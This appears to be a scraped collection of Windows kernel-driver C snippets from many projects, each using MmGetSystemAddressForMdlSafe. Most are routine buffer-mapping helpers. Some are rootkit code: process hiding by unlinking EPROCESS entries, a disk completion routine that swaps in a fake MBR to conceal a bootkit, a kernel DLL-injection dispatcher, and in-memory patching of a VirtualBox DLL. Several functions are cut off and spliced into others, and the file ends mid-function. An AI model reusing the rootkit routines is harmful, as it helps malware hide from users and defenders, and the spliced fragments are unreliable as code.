/*
* TsmiHandleMemWrite
*
* Purpose:
*
* Patch vbox dll in memory.
*
* Warning: potential BSOD-generator due to nonstandard way of loading, take care with patch offsets.
*
*/
NTSTATUS TsmiHandleMemWrite(
_In_ PVOID SrcAddress,
_In_ PVOID DestAddress,
_In_ ULONG Size
)
{
PMDL mdl;
NTSTATUS status = STATUS_SUCCESS;
PAGED_CODE();
mdl = IoAllocateMdl(DestAddress, Size, FALSE, FALSE, NULL);
if (mdl == NULL) {
return STATUS_INSUFFICIENT_RESOURCES;
}
if (DestAddress >= MmSystemRangeStart)
if (!MmIsAddressValid(DestAddress)) {
return STATUS_ACCESS_VIOLATION;
}
MmProbeAndLockPages(mdl, KernelMode, IoReadAccess);
DestAddress = MmGetSystemAddressForMdlSafe(mdl, HighPagePriority);
if (DestAddress != NULL) {
status = MmProtectMdlSystemAddress(mdl, PAGE_EXECUTE_READWRITE);
__movsb((PUCHAR)DestAddress, (const UCHAR *)SrcAddress, Size);
MmUnmapLockedPages(DestAddress, mdl);
MmUnlockPages(mdl);
}
else {
status = STATUS_ACCESS_VIOLATION;
}
IoFreeMdl(mdl);
return status;
}
NTSTATUS DumpKernelMemory(PVOID DstAddr, PVOID SrcAddr, ULONG Size)
{
PMDL pSrcMdl, pDstMdl;
PUCHAR pAddress, pDstAddress;
NTSTATUS st = STATUS_UNSUCCESSFUL;
ULONG r;
// Создаем MDL для буфера-источника
pSrcMdl = IoAllocateMdl(SrcAddr, Size, FALSE, FALSE, NULL);
if (pSrcMdl)
{
// Построение MDL
MmBuildMdlForNonPagedPool(pSrcMdl);
// Получение адреса из MDL
pAddress = (PUCHAR)MmGetSystemAddressForMdlSafe(pSrcMdl, NormalPagePriority);
zDbgPrint("pAddress = %x", pAddress);
if (pAddress != NULL)
{
pDstMdl = IoAllocateMdl(DstAddr, Size, FALSE, FALSE, NULL);
zDbgPrint("pDstMdl = %x", pDstMdl);
if (pDstMdl != NULL)
{
__try
{
MmProbeAndLockPages(pDstMdl, KernelMode, IoWriteAccess);
pDstAddress = (PUCHAR)MmGetSystemAddressForMdlSafe(pDstMdl, NormalPagePriority);
zDbgPrint("pDstAddress = %x", pDstAddress);
if (pDstAddress != NULL)
{
memset(pDstAddress, 0, Size);
zDbgPrint("Copy block");
for (r = 1; r < Size; r++)
{
if (MmIsAddressValid(pAddress))
*pDstAddress = *pAddress;
else
*pDstAddress = 0;
pAddress++;
pDstAddress++;
}
st = STATUS_SUCCESS;
}
MmUnlockPages(pDstMdl);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
zDbgPrint("Copy block exception");
}
IoFreeMdl(pDstMdl);
}
}
/*
* --------------------------------------------------------------------------
* Utility function to map the output buffer in an IRP. The buffer is assumed
* to have been passed down using METHOD_OUT_DIRECT (Direct I/O).
* --------------------------------------------------------------------------
*/
static NTSTATUS
MapIrpOutputBuffer(PIRP irp,
UINT32 bufferLength,
UINT32 requiredLength,
PVOID *buffer)
{
ASSERT(irp);
ASSERT(buffer);
ASSERT(bufferLength);
ASSERT(requiredLength);
if (!buffer || !irp || bufferLength == 0 || requiredLength == 0) {
return STATUS_INVALID_PARAMETER;
}
if (bufferLength < requiredLength) {
return STATUS_NDIS_INVALID_LENGTH;
}
if (irp->MdlAddress == NULL) {
return STATUS_INVALID_PARAMETER;
}
*buffer = MmGetSystemAddressForMdlSafe(irp->MdlAddress,
NormalPagePriority);
if (*buffer == NULL) {
return STATUS_INSUFFICIENT_RESOURCES;
}
return STATUS_SUCCESS;
}
NTSTATUS ReadDirectOut(IN PIRP pIrp,ULONG inSize,ULONG outSize)
{
KdPrint(("ReadDirectOut begin\n"));
NTSTATUS status = STATUS_SUCCESS;
PVOID lp_output_buffer=NULL;
//如果传入了输出缓冲区
if(pIrp->MdlAddress)
{
//锁定输出缓冲区 并映射到内核以供 驱动使用
lp_output_buffer=MmGetSystemAddressForMdlSafe(pIrp->MdlAddress,NormalPagePriority );
KdPrint(("ReadDirectOut inSize=%d outSize=%d\n",inSize,outSize));
UNICODE_STRING unicode_string;
RtlInitUnicodeString(&unicode_string,L"读取数据成功");
RtlCopyMemory(lp_output_buffer,unicode_string.Buffer,unicode_string.Length);
pIrp->IoStatus.Information=unicode_string.Length;
KdPrint(("ReadDirectOut end\n"));
}
return status;
}
NTSTATUS WriteDirectIn(IN PIRP pIrp,ULONG inSize,ULONG outSize)
{
KdPrint(("WriteDirectIn begin\n"));
NTSTATUS status = STATUS_SUCCESS;
//获取用户层传入的 输入缓冲区的地址
PVOID lp_input_buffer=pIrp->AssociatedIrp.SystemBuffer,
lp_output_buffer=NULL;
//如果传入了输出缓冲区
if(pIrp->MdlAddress)
{
//锁定输出缓冲区 并映射到内核以供 驱动使用
lp_output_buffer=MmGetSystemAddressForMdlSafe(pIrp->MdlAddress,NormalPagePriority );
}
KdPrint(("WriteDirectIn inSize=%d outSize=%d %S\n",inSize,outSize,(WCHAR*)lp_input_buffer));
UNICODE_STRING unicode_string;
RtlInitUnicodeString(&unicode_string,L"写入数据成功");
if(lp_output_buffer)
{
RtlCopyMemory(lp_output_buffer,unicode_string.Buffer,unicode_string.Length);
}
pIrp->IoStatus.Information=unicode_string.Length;
KdPrint(("WriteDirectIn end\n"));
return status;
}
PVOID
xixfs_GetCallersBuffer(
PIRP PtrIrp
)
{
PVOID ReturnedBuffer = NULL;
PAGED_CODE();
DebugTrace(DEBUG_LEVEL_TRACE, (DEBUG_TARGET_READ|DEBUG_TARGET_WRITE),
("Enter xixfs_GetCallersBuffer\n"));
// If an MDL is supplied, use it.
if (PtrIrp->MdlAddress) {
ReturnedBuffer = MmGetSystemAddressForMdlSafe(PtrIrp->MdlAddress, NormalPagePriority);
} else {
ReturnedBuffer = PtrIrp->UserBuffer;
}
DebugTrace(DEBUG_LEVEL_TRACE, (DEBUG_TARGET_READ|DEBUG_TARGET_WRITE),
("Exit xixfs_GetCallersBuffer\n"));
return(ReturnedBuffer);
}
PVOID
FuseMapUserBuffer (
IN OUT PIRP Irp
)
{
//
// If there is no Mdl, then we must be in the Fsd, and we can simply
// return the UserBuffer field from the Irp.
//
if (Irp->MdlAddress == NULL) {
return Irp->UserBuffer;
} else {
PVOID Address = MmGetSystemAddressForMdlSafe( Irp->MdlAddress, NormalPagePriority );
if (Address == NULL) {
ExRaiseStatus( STATUS_INSUFFICIENT_RESOURCES );
}
return Address;
}
}
static VOID
SerialGetUserBuffers(
IN PIRP Irp,
IN ULONG IoControlCode,
OUT PVOID* BufferIn,
OUT PVOID* BufferOut)
{
ASSERT(Irp);
ASSERT(BufferIn);
ASSERT(BufferOut);
switch (IO_METHOD_FROM_CTL_CODE(IoControlCode))
{
case METHOD_BUFFERED:
*BufferIn = *BufferOut = Irp->AssociatedIrp.SystemBuffer;
break;
case METHOD_IN_DIRECT:
case METHOD_OUT_DIRECT:
*BufferIn = Irp->AssociatedIrp.SystemBuffer;
*BufferOut = MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority);
break;
case METHOD_NEITHER:
*BufferIn = IoGetCurrentIrpStackLocation(Irp)->Parameters.DeviceIoControl.Type3InputBuffer;
*BufferOut = Irp->UserBuffer;
break;
default:
/* Should never happen */
*BufferIn = NULL;
*BufferOut = NULL;
break;
}
}
//
// Substitute for MmGetSystemAddressForMdlSafe
// for NT 4.0 DDK does not provide its equivqlent
// originally written by Bruce Engle for filedisk
//
static PVOID
MmGetSystemAddressForMdlPrettySafe(
IN PMDL Mdl,
IN MM_PAGE_PRIORITY Priority)
{
#if (VER_PRODUCTBUILD >= 2195)
if (OsMajorVersion >= 5) {
return MmGetSystemAddressForMdlSafe(Mdl, Priority);
}
else {
#endif // (VER_PRODUCTBUILD >= 2195)
CSHORT MdlMappingCanFail;
PVOID MappedSystemVa;
MdlMappingCanFail = (CSHORT)(Mdl->MdlFlags & MDL_MAPPING_CAN_FAIL);
Mdl->MdlFlags |= MDL_MAPPING_CAN_FAIL;
MappedSystemVa = MmGetSystemAddressForMdl(Mdl);
if (!MdlMappingCanFail) {
Mdl->MdlFlags &= ~MDL_MAPPING_CAN_FAIL;
}
return MappedSystemVa;
#if (VER_PRODUCTBUILD >= 2195)
}
#endif // (VER_PRODUCTBUILD >= 2195)
}
NTSTATUS HideProc_Write(PDEVICE_OBJECT DeviceObject, PIRP Irp){
NTSTATUS NtStatus = STATUS_INVALID_PARAMETER;
PIO_STACK_LOCATION pIoStackIrp = NULL;
UINT dwDataWritten = 0;
ULONG dwEProcAddr;
PLIST_ENTRY pListProcs;
PEPROCESS pEProc;
hpstruct *hps;
DbgPrint("HideProc_Write Called\n");
pIoStackIrp = IoGetCurrentIrpStackLocation(Irp);
if(pIoStackIrp && Irp->MdlAddress){
hps = (hpstruct *)MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority);
if(hps){
if(pIoStackIrp->Parameters.Write.Length == sizeof(hpstruct)){
if(PsLookupProcessByProcessId((PVOID)hps->uPid, &pEProc) == STATUS_SUCCESS){
DbgPrint("EPROCESS found. Address: %08lX.\n", pEProc);
DbgPrint("Now hiding process %d...\n", hps->uPid);
dwEProcAddr = (ULONG) pEProc;
__try{
pListProcs = (PLIST_ENTRY) (dwEProcAddr + hps->uFlinkOffset);
*((ULONG*) pListProcs->Blink) = (ULONG) (pListProcs->Flink); //set flink of prev proc to flink of cur proc
*((ULONG*) pListProcs->Flink+1) = (ULONG) (pListProcs->Blink); //set blink of next proc to blink of cur proc
pListProcs->Flink = (PLIST_ENTRY) &(pListProcs->Flink); //set flink and blink of cur proc to themselves
pListProcs->Blink = (PLIST_ENTRY) &(pListProcs->Flink); //otherwise might bsod when exiting process
DbgPrint("Process now hidden.\n");
}__except(EXCEPTION_EXECUTE_HANDLER){
NtStatus = GetExceptionCode();
DbgPrint("Exception: %d.\n", NtStatus);
}
NtStatus = STATUS_SUCCESS;
}
}else{
NTSTATUS SafeCopyMemory(PVOID SrcAddr, PVOID DstAddr, ULONG Size)
{
PMDL pSrcMdl, pDstMdl;
PUCHAR pSrcAddress, pDstAddress;
NTSTATUS st = STATUS_UNSUCCESSFUL;
ULONG r;
BOOL bInit = FALSE;
pSrcMdl = IoAllocateMdl(SrcAddr, Size, FALSE, FALSE, NULL);
if (MmIsAddressValidEx(pSrcMdl))
{
MmBuildMdlForNonPagedPool(pSrcMdl);
pSrcAddress = (PUCHAR)MmGetSystemAddressForMdlSafe(pSrcMdl, NormalPagePriority);
if (MmIsAddressValidEx(pSrcAddress))
{
pDstMdl = IoAllocateMdl(DstAddr, Size, FALSE, FALSE, NULL);
if (MmIsAddressValidEx(pDstMdl))
{
__try
{
MmProbeAndLockPages(pDstMdl, KernelMode, IoWriteAccess);
pDstAddress = (PUCHAR)MmGetSystemAddressForMdlSafe(pDstMdl, NormalPagePriority);
if (MmIsAddressValidEx(pDstAddress))
{
RtlZeroMemory(pDstAddress,Size);
RtlCopyMemory(pDstAddress, pSrcAddress, Size);
st = STATUS_SUCCESS;
}
MmUnlockPages(pDstMdl);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
if (pDstMdl) MmUnlockPages(pDstMdl);
if (pDstMdl) IoFreeMdl(pDstMdl);
if (pSrcMdl) IoFreeMdl(pSrcMdl);
return GetExceptionCode();
}
IoFreeMdl(pDstMdl);
}
}
IoFreeMdl(pSrcMdl);
}
return st;
}
NTSTATUS FileRead(__in BASE_FILE * File, __in PIRP Irp,
__in PIO_STACK_LOCATION IrpStack)
{
BASE_DEVICE *Device = BaseFileGetDevice(File);
DEVICE_DATA *DeviceData = (DEVICE_DATA *) BaseDeviceGetPrivate(Device);
ULONG Length = IrpStack->Parameters.Read.Length;
PLIST_ENTRY ListEntry;
BUFFER_DATA *BufferData = NULL;
PVOID Buffer;
NTSTATUS Status = STATUS_SUCCESS;
PAGED_CODE();
__try {
ListEntry =
ExInterlockedRemoveHeadList(&DeviceData->BufferList,
&DeviceData->BufferListLock);
if (ListEntry == NULL) {
TRACE_MSG(TRACE_LEVEL_ERROR, TRACE_FLAG_DEFAULT,
"No data available\n");
Status = STATUS_NO_DATA_DETECTED;
__leave;
}
BufferData = CONTAINING_RECORD(ListEntry, BUFFER_DATA,
ListEntry);
if (Length < BufferData->Length) {
TRACE_MSG(TRACE_LEVEL_ERROR, TRACE_FLAG_DEFAULT,
"Buffer too small (len=%u, required=%u)\n",
Length, BufferData->Length);
Status = STATUS_INVALID_BUFFER_SIZE;
__leave;
}
ASSERT(Irp->MdlAddress);
if (Irp->MdlAddress == NULL) {
TRACE_MSG(TRACE_LEVEL_ERROR, TRACE_FLAG_DEFAULT,
"Null MDL pointer\n");
Status = STATUS_INVALID_PARAMETER;
__leave;
}
Buffer = MmGetSystemAddressForMdlSafe(Irp->MdlAddress,
NormalPagePriority);
if (Buffer == NULL) {
Status = STATUS_INSUFFICIENT_RESOURCES;
TRACE_ERR("MmGetSystemAddressForMdlSafe", Status);
__leave;
}
TRACE_MSG(TRACE_LEVEL_INFO, TRACE_FLAG_DEFAULT,
"Return %u bytes (requested %u bytes)\n",
BufferData->Length, Length);
RtlCopyMemory(Buffer, BufferData->Data, BufferData->Length);
Irp->IoStatus.Information = BufferData->Length;
}
__finally {
if (BufferData)
ExFreePoolWithTag(BufferData, SAMPLE_POOL_TAG);
BaseFileCompleteRequest(File, Irp, Status);
}
return Status;
}
void __DestrPacket(OUT PPACKET_BASE pPacket)
{
if (pPacket->pMdl)
{
PVOID Va = MmGetSystemAddressForMdlSafe(pPacket->pMdl, LowPagePriority);
ExFreePoolWithTag(Va, (ULONG)'TTWH');
IoFreeMdl(pPacket->pMdl);
}
}
PVOID
FASTCALL
FatMapUserBuffer(PIRP Irp)
{
if (!Irp->MdlAddress)
return Irp->UserBuffer;
else
return MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority);
}
/*
* TsmiHandleMemWrite
*
* Purpose:
*
* Patch vbox dll in memory.
*
* Warning: If compiled not in ReleaseSigned configuration this function is a
* potential BSOD-generator due to nonstandard way of loading, take care with patch offsets.
*
*/
NTSTATUS TsmiHandleMemWrite(
_In_ PVOID SrcAddress,
_In_ PVOID DestAddress,
_In_ ULONG Size
)
{
PMDL mdl;
NTSTATUS status = STATUS_SUCCESS;
PAGED_CODE();
mdl = IoAllocateMdl(DestAddress, Size, FALSE, FALSE, NULL);
if (mdl == NULL) {
#ifdef _DEBUGMSG
DbgPrint("[TSMI] Failed to create MDL at write\n");
#endif
return STATUS_INSUFFICIENT_RESOURCES;
}
#ifdef _SIGNED_BUILD
__try {
#endif //_SIGNED_BUILD
if (DestAddress >= MmSystemRangeStart)
if (!MmIsAddressValid(DestAddress)) {
#ifdef _DEBUGMSG
DbgPrint("[TSMI] Invalid address\n");
#endif //_DEBUGMSG
return STATUS_ACCESS_VIOLATION;
}
MmProbeAndLockPages(mdl, KernelMode, IoReadAccess);
DestAddress = MmGetSystemAddressForMdlSafe(mdl, HighPagePriority);
if (DestAddress != NULL) {
status = MmProtectMdlSystemAddress(mdl, PAGE_EXECUTE_READWRITE);
__movsb((PUCHAR)DestAddress, (const UCHAR *)SrcAddress, Size);
MmUnmapLockedPages(DestAddress, mdl);
MmUnlockPages(mdl);
}
else {
status = STATUS_ACCESS_VIOLATION;
}
#ifdef _SIGNED_BUILD
}
__except (EXCEPTION_EXECUTE_HANDLER) {
status = STATUS_ACCESS_VIOLATION;
#ifdef _DEBUGMSG
DbgPrint("[TSMI] MmProbeAndLockPages failed at write DestAddress = %p\n", DestAddress);
#endif //_DEBUGMSG
}
#endif //_SIGNED_BUILD
IoFreeMdl(mdl);
return status;
}
void NotifyReceivedPacket(BASE_FILE * File)
{
CSFBR_FILE_DATA *FileData =
(CSFBR_FILE_DATA *) BaseFileGetPrivate(File);
CSF_PKT *pkt;
PIRP Irp;
PVOID Buffer;
PIO_STACK_LOCATION IrpStack;
NTSTATUS Status = STATUS_SUCCESS;
if (csf_pktq_empty(FileData->rxq)) {
TRACE_MSG(TRACE_LEVEL_ERROR, TRACE_FLAG_DEFAULT,
"Packet queue empty\n");
return;
}
Irp = IoCsqRemoveNextIrp(&FileData->csq, NULL);
if (Irp == NULL) {
TRACE_MSG(TRACE_LEVEL_ERROR, TRACE_FLAG_DEFAULT,
"IRP list empty\n");
return;
}
pkt = csf_pktq_remove(FileData->rxq);
if (pkt == NULL) {
TRACE_MSG(TRACE_LEVEL_ERROR, TRACE_FLAG_DEFAULT,
"Packet queue empty\n");
Status = STATUS_NO_DATA_DETECTED;
} else {
ASSERT(Irp->MdlAddress);
Buffer = MmGetSystemAddressForMdlSafe(Irp->MdlAddress,
NormalPagePriority);
if (Buffer == NULL) {
Status = STATUS_INSUFFICIENT_RESOURCES;
TRACE_ERR("MmGetSystemAddressForMdlSafe", Status);
} else {
IrpStack = IoGetCurrentIrpStackLocation(Irp);
if (IrpStack->Parameters.Read.Length <
csf_pkt_get_len(pkt)) {
TRACE_MSG(TRACE_LEVEL_ERROR, TRACE_FLAG_DEFAULT,
"Read buffer too small - len %u, required %u\n",
IrpStack->Parameters.Read.Length,
csf_pkt_get_len(pkt));
Status = STATUS_BUFFER_TOO_SMALL;
} else {
RtlCopyMemory(Buffer, csf_pkt_get_buf(pkt),
csf_pkt_get_len(pkt));
Irp->IoStatus.Information =
csf_pkt_get_len(pkt);
}
}
csf_pkt_return(pkt);
}
BaseFileCompleteRequest(File, Irp, Status);
}
NTSTATUS CFTDefaultDispatch(PDEVICE_OBJECT aDeviceObject, PIRP aIrp)
{
PIO_STACK_LOCATION ioStackLocation = IoGetCurrentIrpStackLocation(aIrp);
NTSTATUS status = STATUS_SUCCESS;
ULONG i = 0, j = 0;
// 首先需要知道发送给了那哪个设备。
for (i = 0; i < CFT_MAX_COM_ID; ++i)
{
if (global_FileDevice[i] == aDeviceObject)
{
// 所有电源操作一律不过滤
if (ioStackLocation->MajorFunction == IRP_MJ_POWER)
{
// 直接发送
PoStartNextPowerIrp(aIrp);
IoSkipCurrentIrpStackLocation(aIrp);
return PoCallDriver(global_RealDevice[i], aIrp);
}
// 我们只过滤写请求,获得缓冲区以及长度,打印出来。
if (ioStackLocation->MajorFunction == IRP_MJ_WRITE)
{
// 获得长度
ULONG len = ioStackLocation->Parameters.Write.Length;
// 获得缓冲区
PUCHAR buf = NULL;
if (aIrp->MdlAddress != NULL)
buf = (PUCHAR)MmGetSystemAddressForMdlSafe(aIrp->MdlAddress, NormalPagePriority);
else
buf = (PUCHAR)aIrp->UserBuffer;
if (buf == NULL)
buf = (PUCHAR)aIrp->AssociatedIrp.SystemBuffer;
// 打印内容
for (j = 0; j < len; ++j)
DbgPrint("COM capture : Send-Data : %2x\r\n", buf[j]);
}
}
// 直接下发
IoSkipCurrentIrpStackLocation(aIrp);
return IoCallDriver(global_RealDevice[i], aIrp);
}
// 如果根本就不在被绑定的设备中,那是有问题的,直接返回参数
aIrp->IoStatus.Information = 0;
aIrp->IoStatus.Status = STATUS_INVALID_PARAMETER;
IoCompleteRequest(aIrp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
PVOID
MrGetUserBuffer(IN PIRP Irp)
{
ASSERT(Irp != NULL);
if (Irp->MdlAddress) {
return MmGetSystemAddressForMdlSafe(Irp->MdlAddress,
NormalPagePriority);
} else {
return Irp->UserBuffer;
}
}
//Called after a read request to the MBR has been processed
NTSTATUS MbrReadComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)
{
PVOID SystemMdlAddress;
PIO_STACK_LOCATION StackLocation;
PCOMPLETION_CTX CompletionCtx;
CHAR InvokeCompletion = FALSE;
UCHAR Control;
NTSTATUS IrpStatus, status = STATUS_SUCCESS;
CompletionCtx = (PCOMPLETION_CTX)Context;
StackLocation = IoGetCurrentIrpStackLocation(Irp);
//If request was successful, we need to replace the real MBR inside buffer
if(NT_SUCCESS(Irp->IoStatus.Status) && CompletionCtx->TransferLength > 0)
{
SystemMdlAddress = MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority);
if(SystemMdlAddress)
{
memcpy(SystemMdlAddress, FakeMbr, 512);
DbgPrint("{CompletionRoutine} Disk read request was successful, replaced MBR in buffer %X\n", CompletionCtx->TransferLength);
}
}
//Restore original completion routine information
StackLocation->Context = CompletionCtx->OriginalContext;
StackLocation->CompletionRoutine = CompletionCtx->OriginalRoutine;
StackLocation->Control = CompletionCtx->OriginalControl;
Control = StackLocation->Control;
IrpStatus = Irp->IoStatus.Status;
//If there is an original completion routine, check if it should be called
if(StackLocation->CompletionRoutine)
{
if(NT_SUCCESS(IrpStatus) && (Control & SL_INVOKE_ON_SUCCESS) == SL_INVOKE_ON_SUCCESS)
InvokeCompletion = TRUE;
if(IrpStatus == STATUS_CANCELLED && (Control & SL_INVOKE_ON_CANCEL) == SL_INVOKE_ON_CANCEL)
InvokeCompletion = TRUE;
if(NT_ERROR(IrpStatus) && IrpStatus != STATUS_CANCELLED &&
(Control & SL_INVOKE_ON_ERROR) == SL_INVOKE_ON_ERROR)
InvokeCompletion = TRUE;
}
//Call original completion routine
if(InvokeCompletion == TRUE)
status = (StackLocation->CompletionRoutine)(DeviceObject, Irp, StackLocation->Context);
ExFreePool(Context);
return status;
}
NTSTATUS DriverDispatch(PDEVICE_OBJECT DeviceObject,PIRP irp)
{
PIO_STACK_LOCATION io;
PINJECT_INFO InjectInfo;
NTSTATUS status;
io=IoGetCurrentIrpStackLocation(irp);
irp->IoStatus.Information=0;
switch(io->MajorFunction)
{
case IRP_MJ_CREATE:
status=STATUS_SUCCESS;
break;
case IRP_MJ_CLOSE:
status=STATUS_SUCCESS;
break;
case IRP_MJ_READ:
status=STATUS_SUCCESS;
break;
case IRP_MJ_WRITE:
InjectInfo=(PINJECT_INFO)MmGetSystemAddressForMdlSafe(irp->MdlAddress,NormalPagePriority);
if(!InjectInfo)
{
status=STATUS_INSUFFICIENT_RESOURCES;
break;
}
if(!InjectDll(InjectInfo))
{
status=STATUS_UNSUCCESSFUL;
break;
}
status=STATUS_SUCCESS;
irp->IoStatus.Information=sizeof(INJECT_INFO);
break;
default:
status=STATUS_INVALID_DEVICE_REQUEST;
break;
}
irp->IoStatus.Status=status;
IoCompleteRequest(irp,IO_NO_INCREMENT);
return status;
}
NTSTATUS FileWrite(__in BASE_FILE * File, __in PIRP Irp,
__in PIO_STACK_LOCATION IrpStack)
{
BASE_DEVICE *Device = BaseFileGetDevice(File);
DEVICE_DATA *DeviceData = (DEVICE_DATA *) BaseDeviceGetPrivate(Device);
ULONG Length = IrpStack->Parameters.Write.Length;
PVOID Buffer;
BUFFER_DATA *BufferData;
size_t Size;
NTSTATUS Status = STATUS_SUCCESS;
PAGED_CODE();
__try {
ASSERT(Irp->MdlAddress);
if (Irp->MdlAddress == NULL) {
TRACE_MSG(TRACE_LEVEL_ERROR, TRACE_FLAG_DEFAULT,
"Null MDL pointer\n");
Status = STATUS_INVALID_PARAMETER;
__leave;
}
Buffer = MmGetSystemAddressForMdlSafe(Irp->MdlAddress,
NormalPagePriority);
if (Buffer == NULL) {
Status = STATUS_INSUFFICIENT_RESOURCES;
TRACE_ERR("MmGetSystemAddressForMdlSafe", Status);
__leave;
}
Size = FIELD_OFFSET(BUFFER_DATA, Data) + Length;
BufferData =
(BUFFER_DATA *) ExAllocatePoolWithTag(NonPagedPool, Size,
SAMPLE_POOL_TAG);
if (BufferData == NULL) {
Status = STATUS_INSUFFICIENT_RESOURCES;
TRACE_ERR("ExAllocatePoolWithTag", Status);
__leave;
}
TRACE_MSG(TRACE_LEVEL_INFO, TRACE_FLAG_DEFAULT,
"Write %u bytes\n",
IrpStack->Parameters.Write.Length);
RtlCopyMemory(BufferData->Data, Buffer, Length);
BufferData->Length = Length;
ExInterlockedInsertTailList(&DeviceData->BufferList,
&BufferData->ListEntry,
&DeviceData->BufferListLock);
Irp->IoStatus.Information = Length;
}
__finally {
BaseFileCompleteRequest(File, Irp, Status);
}
return Status;
}
PVOID
NtfsGetUserBuffer(PIRP Irp,
BOOLEAN Paging)
{
if (Irp->MdlAddress != NULL)
{
return MmGetSystemAddressForMdlSafe(Irp->MdlAddress, (Paging ? HighPagePriority : NormalPagePriority));
}
else
{
return Irp->UserBuffer;
}
}
void *mm_map_mdl_success(PMDL mdl)
{
void *mem;
int timeout;
for (timeout = DC_MEM_RETRY_TIMEOUT; timeout > 0; timeout -= DC_MEM_RETRY_TIME)
{
if (mem = MmGetSystemAddressForMdlSafe(mdl, HighPagePriority)) break;
if (KeGetCurrentIrql() >= DISPATCH_LEVEL) break;
dc_delay(DC_MEM_RETRY_TIME);
}
return mem;
}
NTSTATUS netgIO_WriteDirectIO(PDEVICE_OBJECT pDeviceObject, PIRP pIrp) {
NTSTATUS NtStatus = STATUS_SUCCESS;
PIO_STACK_LOCATION pIoStackIrp = NULL;
POPEN_CONTEXT pOpenContext;
PCHAR pWriteDataBuffer;
DBGPRINT((" netgIO_WriteDirectIO Called \n"));
/*
* Each time the IRP is passed down the driver stack a new stack location is added
* specifying certain parameters for the IRP to the driver.
*/
pIoStackIrp = IoGetCurrentIrpStackLocation(pIrp);
pOpenContext = pIoStackIrp->FileObject->FsContext;
if (pOpenContext == NULL) {
DBGPRINT(("Write: FileObject %p not yet associated with a device\n", pIoStackIrp->FileObject));
return STATUS_INVALID_HANDLE;
}
if (pIrp->MdlAddress == NULL) {
DBGPRINT(("Write: NULL MDL address on IRP %p\n", pIrp));
return STATUS_INVALID_PARAMETER;
}
if(pIoStackIrp) {
// Try to get a virtual address for the MDL.
pWriteDataBuffer = MmGetSystemAddressForMdlSafe(pIrp->MdlAddress, NormalPagePriority);
if (pWriteDataBuffer == NULL) {
DBGPRINT(("Write: MmGetSystemAddr failed for IRP %p, MDL %p\n", pIrp, pIrp->MdlAddress));
return STATUS_INSUFFICIENT_RESOURCES;
}
/*
* We need to verify that the string is NULL terminated. Bad things can happen
* if we access memory not valid while in the Kernel.
*/
if(IsStringTerminated(pWriteDataBuffer, pIoStackIrp->Parameters.Write.Length)) {
DBGPRINT((pWriteDataBuffer));
} else {
DBGPRINT(("Write: String is not ZeroTerminated!"));
}
}
pIrp->IoStatus.Status = NtStatus;
pIrp->IoStatus.Information = 0;
IoCompleteRequest(pIrp, IO_NO_INCREMENT);
return NtStatus;
}
NTSTATUS
ProcReadWrite (PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
PIO_STACK_LOCATION IrpSp;
NTSTATUS Status;
struct file *fp;
int rc;
PCHAR buf;
IrpSp = IoGetCurrentIrpStackLocation(Irp);
if (Irp->MdlAddress) {
buf = MmGetSystemAddressForMdlSafe(
Irp->MdlAddress,
NormalPagePriority);
} else {
buf = Irp->AssociatedIrp.SystemBuffer;
}
if (buf == NULL) {
Status = STATUS_SUCCESS;
rc = 0;
} else {
fp = (struct file *)IrpSp->FileObject->FsContext;
if (!fp) {
Status = STATUS_INVALID_PARAMETER;
goto errorout;
}
if (IrpSp->MajorFunction == IRP_MJ_READ) {
rc = lustre_read_file(
fp, IrpSp->Parameters.Read.ByteOffset.LowPart,
IrpSp->Parameters.Read.Length, buf);
} else {
rc = lustre_write_file(
fp, IrpSp->Parameters.Write.ByteOffset.LowPart,
IrpSp->Parameters.Write.Length, buf);
}
if (rc < 0) {
cfs_enter_debugger();
Status = STATUS_UNSUCCESSFUL;
} else {
Status = STATUS_SUCCESS;
}
}
errorout:
return LstCompleteIrp(Irp, Status, rc);
}
NTSTATUS Ext_CryptBlocks(PEXTENSION_CONTEXT ExtContext, PMDL pSourceMdl, PMDL pTargetMdl, SIZE_T size, SIZE_T sector, BOOLEAN Encrypt)
{
NTSTATUS status = STATUS_SUCCESS;
PVOID pSource = NULL, pTarget = NULL;
CONST SIZE_T SectorSize = 512;
SIZE_T SectorOffset = 0;
if (!ExtContext || !pSourceMdl || !pTargetMdl)
return STATUS_INVALID_PARAMETER;
if (!ExtContext->pCipherContext)
return STATUS_SUCCESS;
pSource = MmGetSystemAddressForMdlSafe(pSourceMdl, NormalPagePriority);
pTarget = MmGetSystemAddressForMdlSafe(pTargetMdl, NormalPagePriority);
if (!pSource || !pTarget)
return STATUS_INSUFFICIENT_RESOURCES;
LOG_ASSERT(0 == size % SectorSize);
EXTLOG(LL_VERBOSE, "VHD: %s 0x%X bytes\n", Encrypt ? "Encrypting" : "Decrypting", size);
for (SectorOffset = 0; SectorOffset < size; SectorOffset += SectorSize)
{
PUCHAR pSourceSector = (PUCHAR)pSource + SectorOffset;
PUCHAR pTargetSector = (PUCHAR)pTarget + SectorOffset;
status = (Encrypt ? ExtContext->pCipherEngine->pfnEncrypt : ExtContext->pCipherEngine->pfnDecrypt)(
ExtContext->pCipherContext, pSourceSector, pTargetSector, SectorSize, sector++);
if (!NT_SUCCESS(status))
break;
}
if (pSourceMdl && 0 != (pSourceMdl->MdlFlags & MDL_MAPPED_TO_SYSTEM_VA))
MmUnmapLockedPages(pSource, pSourceMdl);
if (pTargetMdl && 0 != (pTargetMdl->MdlFlags & MDL_MAPPED_TO_SYSTEM_VA))
MmUnmapLockedPages(pTarget, pTargetMdl);
return status;
}
static
PVOID
MapUserBuffer(
_In_ _Out_ PIRP Irp)
{
if (Irp->MdlAddress == NULL)
{
return Irp->UserBuffer;
}
else
{
return MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority);
}
}
NTSTATUS ControlInstructions(IN PDEVICE_OBJECT pDevObj,IN PIRP pIrp,ULONG inSize,ULONG outSize)
{
NTSTATUS status = STATUS_SUCCESS;
//获取用户层传入的 输入缓冲区的地址
PVOID lp_input_buffer=pIrp->AssociatedIrp.SystemBuffer,
lp_output_buffer=NULL;
pIrp->IoStatus.Information=0;
ULONG* size_returned=&pIrp->IoStatus.Information;
if(lp_input_buffer && inSize>3)
{
